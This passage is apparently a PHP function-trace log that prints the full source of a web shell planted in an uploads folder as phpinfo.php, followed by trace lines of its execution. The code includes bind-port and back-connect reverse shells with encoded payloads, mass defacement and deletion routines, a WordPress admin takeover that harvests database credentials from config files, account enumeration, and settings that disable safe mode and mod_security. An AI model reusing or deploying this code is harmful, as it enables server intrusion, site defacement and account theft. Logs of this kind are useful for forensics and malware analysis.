maW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\techo "<center><h1>Network tools</h1><div class=content>\r\n\t<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.port.value,this.pass.value);return false;\'><br>\r\n\t<span>Bind port to /bin/sh</span><br/>\r\n\tPort: <input type=\'text\' name=\'port\' value=\'31337\'> Password: <input type=\'text\' name=\'pass\'> Using: <label><select name=\'using\'><option value=\'bpp\'>Perl</option><option value=\'bpc\'>C</option></select></label> <input type=submit value=\'submit\'>\r\n\t</form><br>\r\n\t<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.server.value,this.port.value);return false;\'>\r\n\t<span>Back-connect to</span><br/>\r\n\tServer: <input type=\'text\' name=\'server\' value=". $_SERVER[\'REMOTE_ADDR\'] ."> Port: <input type=\'text\' name=\'port\' value=\'21\'> Using: <label><select name=\'using\'><option value=\'bcpy\'>Python</option><option value=\'bcp\'>Perl</option><option value=\'bcc\'>C</option></select></label> <input type=submit value=\'submit\'><br><br><br>\r\n\t</form><br>"; \r\n\tif(isset($_POST[\'p1\'])) {\r\n\t\tfunction cf($f,$t) {\r\n\t\t\t$w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n\t\t\tif($w)\t{\r\n\t\t\t\t@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n\t\t\t\t@fclose($w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpc\') {\r\n\t\t\tcf("/tmp/bp.c",$bind_port_c);\r\n\t\t\t$▖ = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n\t\t\t@unlink("/tmp/bp.c");\r\n\t\t\t$▖ .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpp\') {\r\n\t\t\tcf("/tmp/bp.pl",$bind_port_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcc\') {\r\n\t\t\tcf("/tmp/bc.c",$back_connect_c);\r\n\t\t\t$▖ = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n\t\t\t@unlink("/tmp/bc.c");\r\n\t\t\t$▖ .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcp\') {\r\n\t\t\tcf("/tmp/bc.pl",$back_connect_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcpy\') {\r\n\t\t\tcf("/tmp/bc.py",$back_connect_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bc.py ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc.py")."</pre>";\r\n }\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\n\r\n// Back Connect Section END \r\n\r\n\r\nif (isset($_REQUEST[\'mas\'])) {\r\n \r\n@ini_set(\'error_log\', NULL);\r\n@ini_set(\'log_errors\', 0);\r\n@ini_set(\'max_execution_time\', 0);\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\necho "<center><form action=\\"\\" method=\\"post\\"> ";\r\nfunction edit_file($file, $index) {\r\n if (is_writable($file)) {\r\n clear_fill($file, $index);\r\n echo "<Span style=\'color:green;\'><strong> [+] Done 100% Successfull </strong></span><br></center>";\r\n } else {\r\n echo "<Span style=\'color:red;\'><strong> [-] Failed :( </strong></span><br></center>";\r\n }\r\n}\r\nfunction hapus_Massal($dir, $namafile) {\r\n if (is_writable($dir)) {\r\n $dira = scandir($dir);\r\n foreach ($dira as $dirb) {\r\n $dirc = "$dir/$dirb";\r\n $lokasi = $dirc . \'/\' . $namafile;\r\n if ($dirb === \'.\') {\r\n if (file_exists("$dir/$namafile")) {\r\n unlink("$dir/$namafile");\r\n }\r\n } elseif ($dirb === \'..\') {\r\n if (file_exists("" . dirname($dir) . "/$namafile")) {\r\n unlink("" . dirname($dir) . "/$namafile");\r\n }\r\n } else {\r\n if (is_dir($dirc)) {\r\n if (is_writable($dirc)) {\r\n if (file_exists($lokasi)) {\r\n echo "[<font color=red>DELETED</font>] $lokasi<br>";\r\n unlink($lokasi);\r\n $idx = hapus_Massal($dirc, $namafile);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\nfunction clear_fill($file, $index) {\r\n if (file_exists($file)) {\r\n $handle = fopen($file, \'w\');\r\n fwrite($handle, \'\');\r\n fwrite($handle, $index);\r\n fclose($handle);\r\n }\r\n}\r\nfunction gass() {\r\n global $dirr, $index;\r\n chdir($dirr);\r\n $me = str_replace(dirname(__FILE__) . \'/\', \'\', __FILE__);\r\n $files = scandir($dirr);\r\n $notallow = array(".htaccess", "www", "Web.Config", "UMD.php", "Web.config", "web.config", "web.Config", "..", ".");\r\n sort($files);\r\n $n = 0;\r\n foreach ($files as $file) {\r\n if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) {\r\n echo "<center><Span style=\'color: #8A8A8A;\'><strong>$dirr/</span>$file</strong> ====> ";\r\n edit_file($file, $index);\r\n flush();\r\n $n = $n + 1;\r\n }\r\n }\r\n echo "<br>";\r\n echo "<center><br><h3>$n Files Defaced </h3></center><br> ";\r\n}\r\nfunction ListFiles($dirrall) {\r\n if ($dh = opendir($dirrall)) {\r\n $files = Array();\r\n $inner_files = Array();\r\n $me = str_replace(dirname(__FILE__) . \'/\', \'\', __FILE__);\r\n $notallow = array($me, ".htaccess", "www", "Web.Config", "UMD.php", "Web.config", "web.config", "web.Config");\r\n while ($file = readdir($dh)) {\r\n if ($file != "." && $file != ".." && $file[0] != \'.\' && !in_array($file, $notallow)) {\r\n if (is_dir($dirrall . "/" . $file)) {\r\n $inner_files = ListFiles($dirrall . "/" . $file);\r\n if (is_array($inner_files)) $files = array_merge($files, $inner_files);\r\n } else {\r\n array_push($files, $dirrall . "/" . $file);\r\n }\r\n }\r\n }\r\n closedir($dh);\r\n return $files;\r\n }\r\n}\r\nfunction gass_all() {\r\n global $index;\r\n $dirrall = $_POST[\'d_dir\'];\r\n foreach (ListFiles($dirrall) as $key => $file) {\r\n $file = str_replace(\'//\', "/", $file);\r\n echo "<center><strong>$file</strong> ===>";\r\n edit_file($file, $index);\r\n flush();\r\n }\r\n $key = $key + 1;\r\n echo "<center><br><h3>$key Files Defaced </h3></center><br>";\r\n}\r\nfunction sabun_Massal($dir, $namafile, $isi_script) {\r\n if (is_writable($dir)) {\r\n $dira = scandir($dir);\r\n foreach ($dira as $dirb) {\r\n $dirc = "$dir/$dirb";\r\n $lokasi = $dirc . \'/\' . $namafile;\r\n if ($dirb === \'.\') {\r\n file_put_contents($lokasi, $isi_script);\r\n } elseif ($dirb === \'..\') {\r\n file_put_contents($lokasi, $isi_script);\r\n } else {\r\n if (is_dir($dirc)) {\r\n if (is_writable($dirc)) {\r\n echo "<font color=red>[ DONE ] </font><font color=white> $lokasi</font><br>";\r\n file_put_contents($lokasi, $isi_script);\r\n $idx = sabun_Massal($dirc, $namafile, $isi_script);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\nif ($_POST[\'Mass\'] == \'onedir\') {\r\n echo "<br> Versi Text Area<br><textarea style=\'background:black;outline:none;color:red;\' name=\'index\' rows=\'10\' cols=\'67\'>\r\n";\r\n $ini = "http://";\r\n $mainpath = $_POST[d_dir];\r\n $file = $_POST[d_file];\r\n $dir = opendir("$mainpath");\r\n $code = base64_encode($_POST[script]);\r\n $indx = base64_decode($code);\r\n while ($row = readdir($dir)) {\r\n $start = @fopen("$row/$file", "w+");\r\n $finish = @fwrite($start, $indx);\r\n if ($finish) {\r\n echo "$ini$row/$file\r\n";\r\n }\r\n }\r\n echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\r\n";\r\n $mainpath = $_POST[d_dir];\r\n $file = $_POST[d_file];\r\n $dir = opendir("$mainpath");\r\n $code = base64_encode($_POST[script]);\r\n $indx = base64_decode($code);\r\n while ($row = readdir($dir)) {\r\n $start = @fopen("$row/$file", "w+");\r\n $finish = @fwrite($start, $indx);\r\n if ($finish) {\r\n echo \'<a href="http://\' . $row . \'/\' . $file . \'" target="_blank">http://\' . $row . \'/\' . $file . \'</a><br>\';\r\n }\r\n }\r\n} elseif ($_POST[\'Mass\'] == \'sabunkabeh\') {\r\n gass();\r\n} elseif ($_POST[\'Mass\'] == \'hapusMassal\') {\r\n hapus_Massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\n} elseif ($_POST[\'Mass\'] == \'sabunmematikan\') {\r\n gass_all();\r\n} elseif ($_POST[\'Mass\'] == \'Massdeface\') {\r\n echo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n sabun_Massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n echo "</div>";\r\n} else {\r\n echo "<center>\t\t<font face=\'Open Sans\' color=\'red\' size=\'3\' >Select Type:<br></font><select class=\\"select\\" name=\\"Mass\\" style=\\"width: 450px; background-color:#000000; color:#ffffff\\" height=\\"10\\" ><option value=\\"onedir\\">Mass Deface 1 Dir</option>\t<option value=\\"Massdeface\\">Mass Deface ALL Dir</option><option value=\\"sabunkabeh\\">Current Dir All Files</option>\t<option value=\\"sabunmematikan\\">Replace Everything With Deface</option><option value=\\"hapusMassal\\">Mass Delete Files</option></center></select><br><font face=\'Open Sans\' color=\'red\' size=\'3\' >Folder:</font><br>\t<input name=\'d_dir\' value=\'" . getcwd() . "\' required=\'\' type=\'text\' style=\'width: 450px; background-color:#000000; color:#ffffff\' height=\'10\'><br><font face=\'Open Sans\' color=\'red\' size=\'3\' >Filename:</font><br><input type=\'text\' name=\'d_file\' value=\'index.html\' style=\'width: 450px; background-color:#000000; color:#ffffff\' height=\'10\'><br><font face=\'Open Sans\' color=\'red\' size=\'3\' >Index File:</font><br>\r\n\t\r\n\t<textarea name=\'script\' style=\'width: 450px; height: 200px; background-color:#000000; color:#ffffff \'> </textarea><br>\r\n\t\r\n\t<input type=\'submit\' name=\'start\' value=\'Mass Deface\' style=\'width: 200px;\'></form></center></div>";\r\n}\r\n die;\r\n}\r\n\r\nif (isset($_REQUEST[\'user\'])) {\r\necho"<html><head><title>Priv8 Shell Wp Mass User Changer</title></head>\r\n<style>\r\n@import \'https://fonts.googleapis.com/css?family=Open+Sans\';\r\n\r\nh1{\r\n\tcolor:#16a085;\r\n\ttext-shadow:0 0 5px;\r\n\tfont-family: Open Sans;\r\n}\r\n#gter{\r\n\tposition: absolute;\r\n\ttop: 0;\r\n\twidth: 100%;\r\n\ttext-align: center;\r\n\tbackground: black;\r\n\tcolor:#fff;\r\n\tpadding-top: 10px;\r\n\tpadding-bottom: 10px;\r\n\tfont-family: Open Sans;\r\n\tmargin-bottom:20px;\r\n}\r\n#gter span{\r\n\tcolor:white;\r\n\tfont-size: 18px;\r\n\ttext-shadow: :0px 0px 15px #00ffff;\r\n}\r\n.f{\r\n\tcolor:white;\r\n\tfont-family: Open Sans;\r\n\ttext-shadow: 0 0 15px #00ffff;\r\n\tfont-size: 21px;\r\n}\r\na{\r\n\tfont-family: Open Sans;\r\n\ttext-decoration: none;\r\n\tcolor:white;\r\n\ttext-shadow:0 0 15px #ff1111;\r\n}\r\nform{\r\n\tmargin-top: 10px;\r\n}\r\ninput[type=submit]{\r\n\tfont-size:13px;\r\n\theight: 25px;\r\n\twidth: 150px;\r\n\tborder: 2px solid red;\r\n\tcolor: white;\r\n\tbackground-color: black;\r\n\tfont-family: Open Sans;\r\n}\r\ninput[type=submit]:hover{\r\n\tbox-shadow: 0 0 2px #ff1111;\r\n}\r\ninput[type=text]{\r\n\tfont-family:Open Sans;\r\n\twidth: 400px;\r\n\theight: 25px;\r\n\tcolor: red;\r\n\tbackground: #000000;\r\n\tborder: 1px solid #ff1111;\r\n\tpadding: 5px;\r\n\ttext-align: center;\r\n\tfont-size:15px;\r\n}\t\r\ninput[type=text]:focus{\r\n\tbox-shadow: 0 0 3px #ff1111;\r\n}\r\n.heading{\r\n\tcolor:white;\r\n\tfont-size:25px;\r\n\tmargin-top: 20px;\r\n\tmargin-bottom: -110px;\r\n\tfont-family:Open Sans;\r\n\ttext-shadow:0px 0px 20px red;\t\r\n}\r\n</style>\r\n</head>\r\n<center>\r\n\r\n<form method=\'post\'>\r\n<input type=\'text\' name=\'config\' placeholder=\'Config URL Here\'>\r\n<br><br>\r\n<input type=\'submit\' name=\'ch\' value=\'Change Admin\'>\r\n</form>\r\n</center>";\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif ($_POST[\'ch\']) {\r\n $get2 = file_get_contents($_POST[\'config\']);\r\n preg_match_all(\'#<a href="(.*?)"#\', $get2, $config);\r\n foreach ($config[1] as $don) {\r\n $get = file_get_contents($_POST[\'config\'] . "/" . $don);\r\n preg_match_all("#\'DB_HOST\', \'(.*?)\'#", $get, $host);\r\n foreach ($host[1] as $don) {\r\n $host = $don;\r\n }\r\n preg_match_all("#\'DB_PASSWORD\', \'(.*?)\'#", $get, $pass);\r\n foreach ($pass[1] as $done) {\r\n $password = $done;\r\n }\r\n preg_match_all("#\'DB_USER\', \'(.*?)\'#", $get, $user);\r\n foreach ($user[1] as $done1) {\r\n $user = $done1;\r\n }\r\n preg_match_all("#\'DB_NAME\', \'(.*?)\'#", $get, $name);\r\n foreach ($name[1] as $done2) {\r\n $name = $done2;\r\n }\r\n preg_match_all("#$table_prefix = \'(.*?)\'#", $get, $prefix);\r\n foreach ($prefix[1] as $done3) {\r\n $prefix = $done3;\r\n }\r\n $connect = mysqli_connect($host, $user, $password, $name);\r\n if ($connect) {\r\n $query1 = mysqli_query($connect, "select * from " . $prefix . "options where option_name=\'siteurl\'");\r\n while ($siteurl = mysqli_fetch_array($query1)) {\r\n $site_url = $siteurl[\'option_value\'];\r\n }\r\n $query2 = mysqli_query($connect, "update " . $prefix . "users set user_login=\'admin\',user_pass=\'a09ac1f98189b89fd578b4fca7bf8bb2\'");\r\n if ($query2) {\r\n echo "<center><span class=f>URL : <a href=\'$site_url/wp-login.php\' target=\'_blank\'>$site_url/wp-login.php</a><br><br>UserName : admin<br><br>Password : Priv8shell<br><br></span></center>";\r\n }\r\n }\r\n }\r\n}\r\n echo"</body></html>";\r\n\t\r\n die;\r\n}\r\n\r\nif (isset($_REQUEST[\'reseller\'])) {\r\necho"<html> <body style=\'text-align: center\'> <center> <table border=\'1\' width=\'50%\' cellspacing=\'0\' cellpadding=\'15\' style=\'border-width: 0px\'> \t\t<tr> \t\t\t<td background=\'http://buyshellsites.com/bg.gif\' style=\'border-style: none; border-width: medium\'> <div align=\'center\'> <table border=\'1\' width=\'100%\' bgcolor=\'#000000\' cellpadding=\'0\' style=\'border-collapse: collapse\' bordercolor=\'#333333\'> \t<tr> \t\t \t\t<td width=\'100\' align=\'center\'> \t\t<font face=\'Courier New\' size=\'2\' color=\'#ff1111\'>Reseller</font></td> \t\t<td width=\'100\' align=\'center\'> \t\t<font face=\'Courier New\' size=\'2\' color=\'#ff1111\'>Accounts</font></td> \t\t<td width=\'100\' align=\'center\'> \t\t<font face=\'Courier New\' size=\'2\' color=\'#ff1111\'>Symlink</font></td> \t\t \t</tr> </table> <BR>";\r\n\r\n\r\n\r\n## grabs resellerss file\r\n$lines = file("/etc/trueuserowners");\r\n\r\n\r\n## split pure resellers\'s names\r\nfor ($i = 0; $i < count($lines); $i++) {\r\n$values2 = split(\': \', $lines[$i]);\r\n$resellers[$i] = $values2[\'1\'];\r\n}\r\n\r\n## remove duplicated resellerss and empty values\r\n$resellers = array_unique($resellers);\r\n$resellers = array_filter($resellers);\r\n\r\nforeach($resellers as $reseller){\r\n\t$count = 0;\r\nfor ($i = 0; $i < count($lines); $i++) {\r\n\t\r\n\tif (strpos($lines[$i], ": $reseller") ) {\r\n $count = $count+1;\r\n}\r\n\t\r\n}\r\n\r\nprint \'<table border="1" width="100%" bgcolor="#333333" cellpadding="0" style="border-collapse: collapse" bordercolor="#000000">\r\n\t<tr>\r\n\t\t\r\n\t\t<td width="100" align="center">\r\n\t\t<font face="Courier New" size="2" color="#ff1111">\'.$reseller.\'</font></td>\r\n\t\t<td width="100" align="center">\r\n\t\t<font face="Courier New" size="2" color="#ff1111">\'.$count.\'</font></td>\r\n\t\t<td width="100" align="center">\r\n\t\t<a href="./sym1/root/home/\'.$reseller.\'/public_html/" target="_blank"><font face="Courier New" size="2" color="#ff1111">Symlink</font></td>\r\n\r\n\t</tr>\r\n</table>\r\n\r\n\r\n\r\n<BR></center> </body> </html>\';\r\n}\r\n\r\n\r\n die;\r\n}\r\n\r\nif (isset($_REQUEST[\'passwd\'])) {\r\n@ini_set(\'error_log\', NULL);\r\n@ini_set(\'log_errors\', 0);\r\n@ini_set(\'max_execution_time\', 0);\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\n echo \'<center>\';\r\n echo "<textarea class=\'inputz\' cols=\'90\' rows=\'20\'>";\r\n for ($uid = 0;$uid < 60000;$uid++) {\r\n $ara = posix_getpwuid($uid);\r\n if (!empty($ara)) {\r\n while (list($key, $val) = each($ara)) {\r\n print "$val:";\r\n }\r\n print "\r\n";\r\n }\r\n }\r\n echo "</textarea><br><br>";\r\n \r\n die;\r\n}\r\nif (isset($_REQUEST[\'disabled\'])) {\r\necho "<html>\r\n\r\n<head>\r\n<meta http-equiv=\'pragma\' content=\'no-cache\'>\r\n</head><body>";\r\n\r\n$fp = fopen("php.ini","w+");\r\nfwrite($fp,"safe_mode = Off\r\ndisable_functions = NONE\r\nopen_basedir = OFF ");\r\necho "<center><b><font color=\'white\' size=\'4\'>[SafeMode Done]</font></center>";\r\necho ("");\r\n\r\n$fp2 = fopen(".htaccess","w+");\r\nfwrite($fp2,"\r\n<IfModule mod_security.c>\r\nKillFilterEngine Off\r\nKillFilterScanPOST Off\r\nKillFilterCheckURLEncoding Off\r\nKillFilterCheckUnicodeEncoding Off\r\n</IfModule>\r\n");\r\n\r\n\r\necho "<center><b> <font color=\'white\' size=\'4\'>[Mod_Security Done]</font></center>";\r\n die;\r\n}\r\nif (isset($_REQUEST[\'sym\'])) {\r\nerror_reporting(0);\r\n$sym_dir = mkdir(\'priv_sympy\', 0755);\r\nchdir(\'priv_sympy\');\r\n$file_sym = "sym.py";\r\n$sym_script = "Iy8qUHl0aG9uCgppbXBvcnQgdGltZQppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcmUKCm9zLnN5c3RlbSgiY29sb3IgQyIpCgpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIgpmID0gIkFsbCBQcm9jZXNzZXMgRG9uZSFcblN5bWxpbmsgQnlwYXNzZWQgU3VjY2Vzc2Z1bGx5IVxuIgpwcmludCAiXG4iCgpvcy5tYWtlZGlycygnc3ltJykKb3MuY2hkaXIoJ3N5bScpCgpzdXNyPVtdCnNpdGV4PVtdCm9zLnN5c3RlbSgibG4gLXMgLyBwcml2OC50eHQiKQoKaCA9ICJPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3NcbkRpcmVjdG9yeUluZGV4IHByaXY4LnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIgptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQptLndyaXRlKGgpCm0uY2xvc2UoKQpwcmludCBodGEKCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+UHJpdjggU215bGluazxicj48L2ZvbnQ+PGJyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9Mz48dGFibGU+IgoKbyA9IG9wZW4oJy9ldGMvcGFzc3dkJywncicpCm89by5yZWFkKCkKbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykKCmZvciB4dXNyIGluIG86Cgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykKCXN1c3IuYXBwZW5kKHh1c3IpCnByaW50ICItIiozMAp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQoKZm9yIHh4c2l0ZSBpbiB4c2l0ZToKCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikKCXNpdGV4LmFwcGVuZCh4eHNpdGUpCnByaW50IGYKcGF0aD1vcy5nZXRjd2QoKQppZiAiL3B1YmxpY19odG1sLyIgaW4gcGF0aDoKCXBhdGg9Ii9wdWJsaWNfaHRtbC8iCmVsc2U6CglwYXRoID0gIi9odG1sLyIKY291bnRlcj0xCmlwcz1vcGVuKCJwcml2OC5waHRtbCIsInciKQppcHMud3JpdGUoc2YpCgpmb3IgZnVzciBpbiBzdXNyOgoJZm9yIGZzaXRlIGluIHNpdGV4OgoJCWZ1PWZ1c3JbMDo1XQoJCXM9ZnNpdGVbMDo1XQoJCWlmIGZ1PT1zOgoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9cHJpdjgudHh0L2hvbWUvJXMlcyB0YXJnZXQ9X2JsYW5rID4lczwvYT48L3RkPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQoJCQljb3VudGVyPWNvdW50ZXIrMQ==";\r\n$sym = fopen($file_sym, "w");\r\nfwrite($sym, base64_decode($sym_script));\r\nchmod($file_sym, 0755);\r\n$khoer = exec("python sym.py");\r\necho "<br><center><font color=\'white\'>Done ...</font> <a href=\'priv_sympy/sym/\' target=\'_blank\'><font color=\'red\'>Click Here</font> </a>";\r\n die;\r\n}\r\n// xd\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($▚) && function_exists(\'action\' . $▚))\r\n\t\t$_POST[\'a\'] = $▚;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'FilesMan\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\n?>' /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 0
5 21 0 0.027640 1377144 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 2 'error_log' NULL
5 21 1 0.027665 1377216
5 21 R ''
5 22 0 0.027680 1377144 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 2 2 'log_errors' 0
5 22 1 0.027697 1377216
5 22 R '1'
5 23 0 0.027713 1377144 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 3 2 'max_execution_time' 0
5 23 1 0.027731 1377248
5 23 R '30'
5 24 0 0.027745 1377144 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 4 2 'output_buffering' 0
5 24 1 0.027761 1377216
5 24 R FALSE
5 25 0 0.027774 1377144 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 5 2 'display_errors' 0
5 25 1 0.027789 1377216
5 25 R ''
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 6 $▘ = TRUE
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 7 $▜ = 'utf-8'
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 8 $▚ = 'FilesMan'
5 26 0 0.027842 1377144 md5 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 9 1 'python-requests/2.25.1'
5 26 1 0.027859 1377240
5 26 R 'ecd862b3d0595af0a0b03f511e800938'
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 9 $▙ = 'ecd862b3d0595af0a0b03f511e800938'
5 27 0 0.027887 1377208 md5 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 10 1 'localhost'
5 27 1 0.027901 1377304
5 27 R '421aa90e079fa326b6494f812ad13e79'
5 28 0 0.027918 1377208 md5 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 11 1 'localhost'
5 28 1 0.027932 1377304
5 28 R '421aa90e079fa326b6494f812ad13e79'
5 29 0 0.027946 1377272 prototype 1 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 11 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 373 _COOKIE['421aa90e079fa326b6494f812ad13e79key'] = 'ecd862b3d0595af0a0b03f511e800938'
6 30 0 0.027980 1377648 setcookie 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 374 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938'
6 30 1 0.028002 1377848
6 30 R TRUE
5 29 1 0.028015 1377784
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 15 _POST['charset'] = 'utf-8'
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 23 $hex = 'SJBEWMMwFIWf/RfHQ8gKzrHnplKmYXuUKqKMRJrQpdORtSkJJrL/YdrqcUK55H7nnnuu7SZpt9NlEhUv+XdQnPpjn3Ebx7j6BmdwOCgz0ruMHWx7yEvHKw+vpeF6bb9LrqDLUx6EQYmvnbRPSGXWM9NJVlKgGnZsmRKSMVuKTW9xO+s0Tql8qFTLi/6uPm0rsUquDsBNhO4wNDzjFrNuJZpRgxgp7qLi+fU9X54TJAB5h8lVeVXvUra4QU52jJAt6nfnhJImqKPiMX9L58tjgP4nY7e4FCbjNM/3uqiF46rVetGn+DOg0ouidOn25n9pPEvh95KEmWzGFFmlu5SeIZot3qZCzjZfMLrS13mm+oTzjCQ4nWP6AQ=='
5 31 0 0.028061 1378160 base64_decode 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 24 1 'SJBEWMMwFIWf/RfHQ8gKzrHnplKmYXuUKqKMRJrQpdORtSkJJrL/YdrqcUK55H7nnnuu7SZpt9NlEhUv+XdQnPpjn3Ebx7j6BmdwOCgz0ruMHWx7yEvHKw+vpeF6bb9LrqDLUx6EQYmvnbRPSGXWM9NJVlKgGnZsmRKSMVuKTW9xO+s0Tql8qFTLi/6uPm0rsUquDsBNhO4wNDzjFrNuJZpRgxgp7qLi+fU9X54TJAB5h8lVeVXvUra4QU52jJAt6nfnhJImqKPiMX9L58tjgP4nY7e4FCbjNM/3uqiF46rVetGn+DOg0ouidOn25n9pPEvh95KEmWzGFFmlu5SeIZot3qZCzjZfMLrS13mm+oTzjCQ4nWP6AQ=='
5 31 1 0.028086 1378640
5 31 R 'H�DX�0\024���\027�C�\nα�R�a{�*��D�Хӑ�)\t&��a��qB��~�{��&i��e\022\025/�wP��c�q\033Ǹ�\006gp8(3һ�\035l{�K�+\017���zm�K���S\036�A����OHe�3�IVR�\032vl�\022�1[�Moq;�4N�|�Tˋ��>m+�J�\016�M��04<�\026�n%�Q�\030)��=_�\023$\000y��UyU�R��ANv��-�w焒&���1K��c��\'c��\024&�4������zѧ�3�ҋ�t��i<K���l�\024Y����!�-ަB�6_0���y����$8�c�\001'
